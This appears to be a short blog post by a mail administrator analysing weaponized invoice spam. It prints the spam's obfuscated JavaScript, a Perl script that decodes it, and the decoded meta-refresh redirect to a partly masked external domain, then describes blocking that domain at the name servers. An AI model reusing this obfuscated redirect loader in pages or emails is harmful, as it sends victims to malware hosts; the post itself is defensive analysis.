The mail servers here started getting inundated with some weaponized email spam about invoice attachments.
The decoded contents of this spam contains the following javascript:
var s="ifmmp!csjbo!=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1<vsm>iuuq;00uvsltbhmjltfo/psh/us0y/iunm#!0?!czf!csjbo";
m=""; for (i=0; i<s.length; i++) { if(s.charCodeAt(i) == 28){ m+= '&';} else if (s.charCodeAt(i) == 23) { m+= '!';} else { m+=String.fromCharCode(s.charCodeAt(i)-1); }}document.write(m);
When I reverse engineered it in perl it produces the following result:
#!/usr/bin/perl
my $s = 'ifmmp!csjbo!=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1<vsm>iuuq;00uvsltbhmjltfo/psh/us0y/iunm#!0?!czf!csjbo';
push @new, chr( ord( $_ ) - 1 ) for split( //, $s );
print join( '', @new ) . "\n";
OUTPUT:
hello brian <meta http-equiv="refresh" content="0;url=http://XXXXturksagliksenXXXX.org.tr/x.html" /> bye brian
I rigged up our name servers so that when one of our customers tries to hit that domain, it just redirects to a web page indicating that it was blocked.
No comments:
Post a Comment